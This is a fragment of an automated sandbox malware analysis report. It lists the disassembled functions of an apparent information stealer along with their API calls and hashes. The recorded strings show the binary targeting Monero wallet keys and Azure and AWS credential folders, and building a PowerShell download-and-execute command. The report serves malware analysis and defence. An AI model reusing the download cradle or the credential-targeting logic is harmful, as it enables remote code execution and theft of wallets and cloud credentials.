                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2428362635-0
                                  • Opcode ID: 7f017c93746be3aba647bfadb2927914b2fadfb7e768d57a9d21e0af83b9ec0e
                                  • Instruction ID: ad38761a52b3ebf71dca900953d4278bf9bad6ca04fb494c1f9bb52e0e0f69a6
                                  • Opcode Fuzzy Hash: 7f017c93746be3aba647bfadb2927914b2fadfb7e768d57a9d21e0af83b9ec0e
                                  • Instruction Fuzzy Hash: B402C370920A16DFDB21EF68C889EEEBBB5AF44340F14422CF845A7251DB34EC95CB90
                                  Function 002B1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002B1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B1135
                                    • Part of subcall function 002B1120: RtlAllocateHeap.NTDLL(00000000), ref: 002B113C
                                    • Part of subcall function 002B1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 002B1159
                                    • Part of subcall function 002B1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 002B1173
                                    • Part of subcall function 002B1120: RegCloseKey.ADVAPI32(?), ref: 002B117D
                                  • lstrcat.KERNEL32(?,00000000), ref: 002B11C0
                                  • lstrlen.KERNEL32(?), ref: 002B11CD
                                  • lstrcat.KERNEL32(?,.keys), ref: 002B11E8
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B121F
                                  • lstrlen.KERNEL32(011C9248), ref: 002B122D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1251
                                  • lstrcat.KERNEL32(00000000,011C9248), ref: 002B1259
                                  • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 002B1264
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1288
                                  • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 002B1294
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B12BA
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B12FF
                                  • lstrlen.KERNEL32(011CD688), ref: 002B130E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1335
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B133D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1378
                                  • lstrcat.KERNEL32(00000000), ref: 002B1385
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B13AC
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 002B13D5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1401
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B143D
                                    • Part of subcall function 002CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 002CEE12
                                  • DeleteFileA.KERNEL32(?), ref: 002B1471
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2881711868-3586502688
                                  • Opcode ID: f5be86d62ea208ede6907f7f4b8a432e4ae7c181bbad310b0173c81179a33f17
                                  • Instruction ID: c0ffff875f40be277dd41765c5bd77d272a28c1e3a6098f6912b6377c5bf4795
                                  • Opcode Fuzzy Hash: f5be86d62ea208ede6907f7f4b8a432e4ae7c181bbad310b0173c81179a33f17
                                  • Instruction Fuzzy Hash: 98A1A271A202169BDB21EF74DC89AEEB7B9AF44380F544064F949E7242DB30ED25CF94
                                  Function 002CE720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 002CE740
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 002CE769
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE79F
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE7AD
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 002CE7C6
                                  • memset.MSVCRT ref: 002CE805
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 002CE82D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE85F
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE86D
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 002CE886
                                  • memset.MSVCRT ref: 002CE8C5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002CE8F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE920
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE92E
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 002CE947
                                  • memset.MSVCRT ref: 002CE986
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$memset$FolderPathlstrcpy
                                  • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 4067350539-3645552435
                                  • Opcode ID: cbd365ec8e242c30e8520fdef743b9a5862a3cdf9b9fa7d0cf0a3be2d36d23a1
                                  • Instruction ID: 391d03a278cf82678bae8fbdb4adce2b9934f9cbcc42b6d93c49917b02a5a064
                                  • Opcode Fuzzy Hash: cbd365ec8e242c30e8520fdef743b9a5862a3cdf9b9fa7d0cf0a3be2d36d23a1
                                  • Instruction Fuzzy Hash: 6B712A71E60259ABDB21EF64DC86FED7374AF48700F5004A8B719AB1C1DA709E588F94
                                  Function 002CABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32 ref: 002CABCF
                                  • lstrlen.KERNEL32(011CE130), ref: 002CABE5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAC0D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002CAC18
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAC41
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAC84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002CAC8E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CACB7
                                  • lstrlen.KERNEL32(002E4AD4), ref: 002CACD1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CACF3
                                  • lstrcat.KERNEL32(00000000,002E4AD4), ref: 002CACFF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAD28
                                  • lstrlen.KERNEL32(002E4AD4), ref: 002CAD3A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAD5C
                                  • lstrcat.KERNEL32(00000000,002E4AD4), ref: 002CAD68
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAD91
                                  • lstrlen.KERNEL32(011CE160), ref: 002CADA7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CADCF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002CADDA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAE03
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CAE3F
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002CAE49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CAE6F
                                  • lstrlen.KERNEL32(00000000), ref: 002CAE85
                                  • lstrcpy.KERNEL32(00000000,011CE058), ref: 002CAEB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen
                                  • String ID: f
                                  • API String ID: 2762123234-1993550816
                                  • Opcode ID: 9ffe610ce2fc5a0df074545ab6385e6d3bdef5e536be17109adadda272a5f428
                                  • Instruction ID: 0eb56905dfc6e2ae604ef7827da927dee8ee3364dc4f30d7483f4c51aa3edf90
                                  • Opcode Fuzzy Hash: 9ffe610ce2fc5a0df074545ab6385e6d3bdef5e536be17109adadda272a5f428
                                  • Instruction Fuzzy Hash: BCB18D3093161BDBDB22EF64DD88BAEB3B5AF40344F144628B845A7291DB30DD25CB91
                                  Function 002D47E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(ws2_32.dll,?,002C72A4), ref: 002D47E6
                                  • GetProcAddress.KERNEL32(00000000,connect), ref: 002D47FC
                                  • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 002D480D
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 002D481E
                                  • GetProcAddress.KERNEL32(00000000,htons), ref: 002D482F
                                  • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 002D4840
                                  • GetProcAddress.KERNEL32(00000000,recv), ref: 002D4851
                                  • GetProcAddress.KERNEL32(00000000,socket), ref: 002D4862
                                  • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 002D4873
                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 002D4884
                                  • GetProcAddress.KERNEL32(00000000,send), ref: 002D4895
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                  • API String ID: 2238633743-3087812094
                                  • Opcode ID: 48ff9c8c0684ac2cfc334e2e0a18605f819ebe386ccf52cdc8669b4c15d8577f
                                  • Instruction ID: 7e426298c0500da8e817522c74d7be8842bd48b62727a79738591484b0b40f17
                                  • Opcode Fuzzy Hash: 48ff9c8c0684ac2cfc334e2e0a18605f819ebe386ccf52cdc8669b4c15d8577f
                                  • Instruction Fuzzy Hash: 701137B19B17F0AFCB109F7AAC8DA553A78BB06709384093EF059DE1A2DAF44510DB58
                                  Function 002CBE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CBE53
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CBE86
                                  • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 002CBE91
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CBEB1
                                  • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 002CBEBD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CBEE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002CBEEB
                                  • lstrlen.KERNEL32(')"), ref: 002CBEF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CBF13
                                  • lstrcat.KERNEL32(00000000,')"), ref: 002CBF1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CBF46
                                  • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 002CBF66
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CBF88
                                  • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 002CBF94
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CBFBA
                                  • ShellExecuteEx.SHELL32(?), ref: 002CC00C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 4016326548-898575020
                                  • Opcode ID: 3d8295f7b53ef03da48681428fd221d19105c5bb0c582282d48719c4178bb1b3
                                  • Instruction ID: db3a15cff0692b049176f4473b9d57df879f7320088d9d99614cd0af32dfa0fd
                                  • Opcode Fuzzy Hash: 3d8295f7b53ef03da48681428fd221d19105c5bb0c582282d48719c4178bb1b3
                                  • Instruction Fuzzy Hash: EE61B631A303469BDB12AFB58C8AAEE7BA9AF04740F54452DF549E7242DB34CD258F90
                                  Function 002D1820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D184F
                                  • lstrlen.KERNEL32(011B7308), ref: 002D1860
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1887
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1892
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D18C1
                                  • lstrlen.KERNEL32(002E4FA0), ref: 002D18D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D18F4
                                  • lstrcat.KERNEL32(00000000,002E4FA0), ref: 002D1900
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D192F
                                  • lstrlen.KERNEL32(011B7328), ref: 002D1945
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D196C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1977
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D19A6
                                  • lstrlen.KERNEL32(002E4FA0), ref: 002D19B8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D19D9
                                  • lstrcat.KERNEL32(00000000,002E4FA0), ref: 002D19E5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1A14
                                  • lstrlen.KERNEL32(011B72C8), ref: 002D1A2A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1A51
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1A5C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1A8B
                                  • lstrlen.KERNEL32(011B7218), ref: 002D1AA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1AC8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1AD3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1B02
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  • Opcode ID: f258521c5b132c3028fc06b96ce09a01c34fcdb4bebab326e22c6fea174f1187
                                  • Instruction ID: 812cf0b43322476a7d0f64d0c08a71155cdb9e675ff04164f020dc6dc5504d33
                                  • Opcode Fuzzy Hash: f258521c5b132c3028fc06b96ce09a01c34fcdb4bebab326e22c6fea174f1187
                                  • Instruction Fuzzy Hash: D6912070621743EBEB20DFB5DD98A66B7E8AF04340B24483AA8C6D7751DB34EC65CB50
                                  Function 002C4760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4793
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 002C47C5
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C4812
                                  • lstrlen.KERNEL32(002E4B60), ref: 002C481D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C483A
                                  • lstrcat.KERNEL32(00000000,002E4B60), ref: 002C4846
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C486B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4898
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C48A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C48CA
                                  • StrStrA.SHLWAPI(?,00000000), ref: 002C48DC
                                  • lstrlen.KERNEL32(?), ref: 002C48F0
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C4931
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C49B8
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C49E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4A0A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4A30
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C4A5D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
